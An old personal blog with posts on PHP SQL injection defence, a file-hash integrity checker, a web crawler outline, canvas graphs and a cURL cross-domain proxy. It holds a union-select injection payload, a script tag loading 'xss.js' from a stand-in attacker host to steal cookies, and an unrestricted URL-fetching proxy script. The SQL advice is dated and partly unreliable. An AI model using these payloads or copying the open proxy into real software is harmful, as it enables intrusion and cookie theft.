Ted Gueniche

May 14, 2012
by ted

[You and PHP] against [SQL injections], a basic intro

SQL injections are a real treat. Even thou it is an old type of attack, a lot of people are still unaware how to protect their website. More important, what is PHP already doing to protect you?

For the purpose of this article I am talking about PHP (some part might apply to other languages). For those who are not familiar with sql injection, I would first recommend taking a look on wikipedia. For those who are well aware of those attack vectors and even know to defend them self, this blog post is not for you!

There is three attack vectors; data extraction, data manipulation and remote code execution. In most case, the hacker first gain access to the data and then can start modifying and eventually execute code on the server. In other word, when the attacker get access to your database, he can do whatever he wants with your data and can even compromise the whole server.

Until PHP 5.3, magic quotes were on by default. That directive automatically escape input variables to specifically avoid sql injection. It means that if I would send a form, the server would get “ted\’ website” instead of “ted’s website”. It was an effective way to prevent injection (exept for numeric value, which is discussed later on). On top of that, programmers can manually escape input using mysql_real_escape_string.

Why is magic quotes a decent protection? In most case, when an input is used in a sql query, it is quoted:

SELECT content FROM _pages WHERE title = “$title”

Meaning that if I would want to exploit it, I could use as input:

-1″ union select db_name() –

Now, by using magic quote, it would be percieved as -1\” union select db_name() — and the query would look like:

SELECT content FROM _pages WHERE title = “-1\” union select db_name() –”

The only reason the attack failed is because the input inside the query is quoted. There is a quote before the input and one after. And that is exactly where programmers create security flaws, usually it is with numeric value because the quote are not mandatory.

$id = mysql_real_escape_string($_POST['id']);

SELECT content FROM _pages WHERE id = $id

In this case, the query is totally unsafe and neither magic_quotes or mysql_real_escape_string can protect this query from sql injections.

The truth is, it is really easy to protect yourself, PHP is making most of the work, just remember:

  • Put the magic_quote directive on (not always the best option) OR use mysql_real_escape_string on every input (recommended).
  • Quote every value in every sql query.

What is difficult to understand is why enormous projects like Sony’s website are vulnerable to such attack. Security should always be one of the top concern in any web based project. I would even say that any project should be created around a security system.

A last word on the subject, I did not mention “SQL statements” or “stored procedure” even tho they are a really good protection to SQL injections, if you never heard of that, you should take a look here. I recommend using one of them over magic_quotes!




July 21, 2011
by ted

How to build a simple web crawler

I always wanted to be able to automate an HTTP browsing process, for example; to extract every article from a website concerning a specific subject, or to diagnose a website by checking the availability and speed of each page. There is a ton of different applications for this bot. It has to be able to make an HTTP request to a website, then do a specific action for each page and then have some kind of heuristic function to choose which page will be visited next.

The program is divided in a series of steps:

  1. Generating the HTTP request toward the right website/page.
  2. Wrapping the request with the layers headers.
  3. Sending the request and getting the response.
  4. Extracting the HTML code from the response
  5. Executing a callback function on the response.
  6. Decide which page will be analyzed next.
  7. Repeat.

This program could easily be developed as a software for an OS or as a web app using PHP. I won’t go any further since there is a lot of different bots doing this. But if you are actually building one, let me know!

List of existing HTTP bots (taken from wikipedia):

  • Aspseek is a crawler, indexer and a search engine written in C++ and licensed under the GPL
  • crawler4j is a crawler written in Java and released under an Apache License. It can be configured in a few minutes and is suitable for educational purposes.
  • DataparkSearch is a crawler and search engine released under the GNU General Public License.
  • GNU Wget is a command-line-operated crawler written in C and released under the GPL. It is typically used to mirror Web and FTP sites.
  • GRUB is an open source distributed search crawler that Wikia Search <http://wikiasearch.com> uses to crawl the web.
  • Heritrix is the Internet Archive‘s archival-quality crawler, designed for archiving periodic snapshots of a large portion of the Web. It was written in Java.
  • ht://Dig includes a Web crawler in its indexing engine.
  • HTTrack uses a Web crawler to create a mirror of a web site for off-line viewing. It is written in C and released under the GPL.
  • ICDL Crawler is a cross-platform web crawler written in C++ and intended to crawl Web sites based on Web-site Parse Templates using computer’s free CPU resources only.
  • mnoGoSearch is a crawler, indexer and a search engine written in C and licensed under the GPL (Linux machines only)
  • Nutch is a crawler written in Java and released under an Apache License. It can be used in conjunction with the Lucene text-indexing package.
  • Open Search Server is a search engine and web crawler software release under the GPL.
  • Pavuk is a command-line Web mirror tool with optional X11 GUI crawler and released under the GPL. It has bunch of advanced features compared to wget and httrack, e.g., regular expression based filtering and file creation rules.
  • the tkWWW Robot, a crawler based on the tkWWW web browser (licensed under GPL).
  • YaCy, a free distributed search engine, built on principles of peer-to-peer networks (licensed under GPL).




July 12, 2011
by ted

Website hash check – adding another security layer

This article presents an implementation of a validation mechanism for a website. The objective behind this is to detect any file modifications made by a bad guy.

In a typical case, an attacker exploits a website and hide a backdoor in a file in order to easily regain access to the website. A backdoor can be as simple as this:


All the attacker has to do after that is to send an HTTP POST request with a “exploit” parameter containing some php.

Instead of installing a backdoor, the hacker could also include some javascript on every page of the infected website in order to steal cookies information or to achieve any other XSS attack. For example, he would automatically include the following snippet on every html page:

<script type='text/javascript' src='http://www.HackerWebsite.com/xss.js'/>

So I am about to show you a way to detect those types of intrusion, if you never heard of hashing or you are not quite sure how it works, go take a look here! The hashing process is divided in two parts:

  1. Generating and saving the file signature (using a hashing algorithm) for each file of the website.
  2. Periodically checking if any file has been changed by comparing with the saved signatures.

I am using the SHA1 hash algorithm (you can use any other algorithm, just keep in mind that MD5 is not secure anymore). The process of generating and saving the file signatures is almost the same as checking those signatures. They both include browsing thru the directory tree and doing a action on each encountered file.

So to make the process reusable (not necessary easier to understand), I created a function that navigate thru directory and that have 2 functions pointers as parameters. One of the function will be called of every file encountered and the other one for each directory. Here’s the code:

//Class representing a file
class file
    public $name;
    public $path;
    public $hash;

//Navigate thru all the subdirectory recursively of the $dir parameter
//@$callbackFile: function called for every file encounter while navigation
//@$callbackDir: function called before navigating into any subdirectory
function browse($dir, $callbackFile, $callbackDir)
    //if the directory exists and we have enough permission
    if($handle = opendir($dir))
        //calling the directory function for the current Directory

        //for each item in the directory
        while(FALSE !== ($file = readdir($handle)))
            //Items called . and ..  exists in each directory and we are not working on them
            if($file != "." && $file != "..")
                //if the current item is a directory
                if(is_dir($dir .'/'. $file) == true)
                    browse($dir .'/'. $file, $callbackFile, $callbackDir);
                //if it is a file
                    $cur = new file();
                    $cur->path = $dir .'/'. $file;
                    $callbackFile($cur); //callback function
                    unset($cur); //deleting the file object
        closedir($handle); //closing current directory
        echo "Fail opendir: '". $dir ."'";

We are missing the hash class:

//Helper class the hash various object
class hashing    
    //Hash a file
    //@path: relative path from this php file to the targeted file
    //@algo: name of the hashing algorithm (sha1, md5, ...)
    public static function fileHash($path, $algo)
            return hash($algo, file_get_contents($path));
            return -1;

And finally here are the full sources,containing all the other required functions.

In order to test it, extract all the file in a directory on your local server and visit index.php. Click on the “Generate” link and it should generate a list of signature for each directory and save them in “hindex.dat”. Now try to modify or add any file in the directory tree and visit index.php again and click on “Check” this time. You should now see an error messages saying that a file has been modified or added.

So yes it is working and no it is not perfect. An attacker could modify a file and update the list of signature. Or he could delete the list of signatures and you would not know what file has been modified or added. All I did was a proof of concept, if I get the time I’ll add the following features:

  • Crypt the list of signature so it is unreadable nor modifiable.
  • Generate a signature of all the signature lists and save it in the database.


June 27, 2011
by ted

Data visualization engine – Part 1: visualizing

I want to make a score visualization engine that would be use represent a huge amount of data using graphs and statistics. The option to generate custom on-the-go graphs is mandatory and should be simple to achieve. Ill divide the algorithm in three parts ( three articles).

  1. Acquiring the data.
  2. Saving and organizing the data.
  3. Visualizing the data.

In this article I’ll start with how to visualize the data. Javascript and HTML5 will be the main technologies used in order to draw the graphs. I’ll start with a concrete example and I’ll go step by step to build the visualization engine with the example.

Context: A dart game where each players starts with 200 points and the goal is to get to the score of zero using 3 darts each round. In order to win, the players have to get zero or under.

Objective: I want to make a graph representing the sum of the darts from each players for each round for a game.


Round # Ted (points) Justin (points)
1 5 18 5 17 19 8
2 4 4 1 40 18 17
3 16 11 7 8 8 7
4 38 16 14 51 21
5 19 15 11 12 11 1


Let’s make a first graph that have the score on the Y axis and the round number on the X axis. Each player will be represented by a color.  Each set of coordinate will be based on the collected data and represent a sum of darts at a precise round in the game. The graph sould look like this:

The previous graph used a point to point line and also a rectangle representing each point. In order to draw, I’ll use an HTML convas object to display the drawing and create a javascript script to draw on the on it.

Here’s the HTML code for the canvas:

		<canvas id="graph"></convas>

Now I will start writing the javascript, I begin by assigning a variable to the canvas object and then declare a function that draw a line between two sets of coordinates:

var graph = document.getElementById("graph");
var g = graph.getContext('2d');
g.height = 400;
g.width = 600;

var drawLine = function(x1,y1,x2,y2, color)
	y1 = g.height - y1; //inverting y axis
	y2 = g.height - y2;
	g.strokeStyle = color;
	g.lineTo(x1, y1);
	g.lineTo(x2, y2);

And here’s another useful function that draws rectangles instead of lines:

var drawRect = function(x,y,height,width,color)
 y = g.height - y;
 height = g.height - height;

 g.fillStyle = color;
 g.rect(x,y,width, height);

Given an fixed interval for the x axis that is all I needed in order to build this graph.


Here’s the code used in order to generate the previous graph, I started by declaring some data for the two players, then for each data I draw the line’s segment and the rectangle.

//x interval
var intervall = 20;

var dataPlayer1 = new Array("41","18","33","36","7","17","19","59","67");
var dataPlayer2 = new Array("22","54","29","43","8","38","43","26","22");

//temporary variables used to draw lines, not rectangles
var tmpy1 = 0;
var tmpy2 = 0;
var tmpx1 = 0;
var tmpx2 = 0;

//controller for each data
for(var i = 1 ; i < dataPlayer1.length && i < dataPlayer2.length; i++)
 //draw lines
 drawLine(tmpx1, tmpy1, (i+1) * intervall, dataPlayer1[i], "#000000");
 drawLine(200 + tmpx2, tmpy2, 200 + (i+1) * intervall, dataPlayer2[i], "#FF0033");

 //draw rectangles
 drawRect(intervall * i, dataPlayer1[i], 0, intervall, "rgba(0,0,0,0.4");
 drawRect(200 + intervall * i, dataPlayer2[i], 0, intervall, "rgba(255,0,51,0.4)");

 //update temp variables
 tmpy1 = dataPlayer1[i];
 tmpx1 = (i+1) * intervall;
 tmpy2 = dataPlayer2[i];
 tmpx2 = (i+1) * intervall;

Grab the full sources here and check out the live example here.

There is an infinite way to draw graph using canvas. If you love the subject then maybe you should look into circular diagram or some 3D representations. Just remember that the code is executed by the client, so you need to avoid having a slow and heavy application.



June 1, 2011
by ted

Bypassing cross domain ajax restriction using php

This article presents a way to communicate between two distinct webserver using php. The goal is to send a http request to another website in order to get some raw information (XML, JSON,…) or to get some html. The protocol of communication is HTTP and I will be using the cUrl library, which is part of any PHP distribution over the version 4.0.2 in order to send the request (you do not need to install cUrl, it is part of  the PHP package). This library provides a lot of control on the formation you getting and sending across the two servers.

Here’s a simple algorithm that send a GET HTTP request to a server  and display the result:

$ch = curl_init("http://www.ted-gueniche.com/");
curl_setopt($ch, CURLOPT_HEADER, 0);
echo curl_exec($ch);

To complete this example, the following code (placed at www.ted-gueniche.com) intercept and display the http request.

 echo 'You successfully communicated with this server';

Some of you might ask why I did not use javascript to do the http request, well most browser forbid javascript to make request to external domains. It means that this website (www.ted-gueniche.com) connot use ajax to request a page from google.com or any other website but ted-gueniche.com.

The previous technique is awesome but it would be even better if it could communicate with a distant server asynchrosly like an AJAX request. Meaning that we do not need to reload the page to make the request.  Let’s do  a javascript event that will send an ajax request to the previous php code (the one that send HTTP request) .That way we bypassed the cross domain limitation of ajax.

The program is divided in three files:

  1. index.php  is our main page where the AJAX  is originated.
  2. post.php is the script that send the HTTP request using PHP cUrl. This file is located on the same server as index.php
  3. distant.php is located on another server and only generate some html when viewed.



<script type="text/javascript">
  function sendHttp(url) //send an ajax request to "post.php" with the "url" parameter
    var localUrl = "post.php";
    var request = new XMLHttpRequest();

    request.open('POST', localUrl, true);	//setting up a HTTP GET request
    request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    request.setRequestHeader("Content-length", url.length);
    request.setRequestHeader("Connection", "close");

    request.onreadystatechange = notify;    //callback function
    request.send("url=" + url);				//send the request

    function notify()
      if(request.readyState == 4)         //the response is complete
        //displaying the response in the #render element
        var render = document.getElementById("render");
        render.innerHTML = request.responseText;

	<a id="targetEvent" onclick="sendHttp('http://www.google.ca')" href="#"> Click here to send an http request to my blog and receive its frontpage, without reloading the current page. </a>



isset($_POST['url']) && strlen($_POST['url']) > 0 && strlen($_POST['url']) < 123) 
	//initiate the request
	$ch = curl_init($_POST['url']);
	curl_setopt($ch, CURLOPT_HEADER, 0); 	 	

	echo curl_exec($ch); //send and display the request 	

	curl_close($ch); //cleaning up }



 echo 'You successfully communicated with this server';

Once that you put index.php and post.php on a server and distant.php on another one, visit index.php and click on the link.It should display “You successfully communicated with this server” without reloading the page. I’ll finish with a word on security. You do not want people using “post.php” as a proxy or to put down your website. So I’ll propose the following security measures:

  1. Check if the request’s ip is the same as the server’s ip.
  2. Generate a token on index.php that would be sent to post.php which would verify is the token is valid.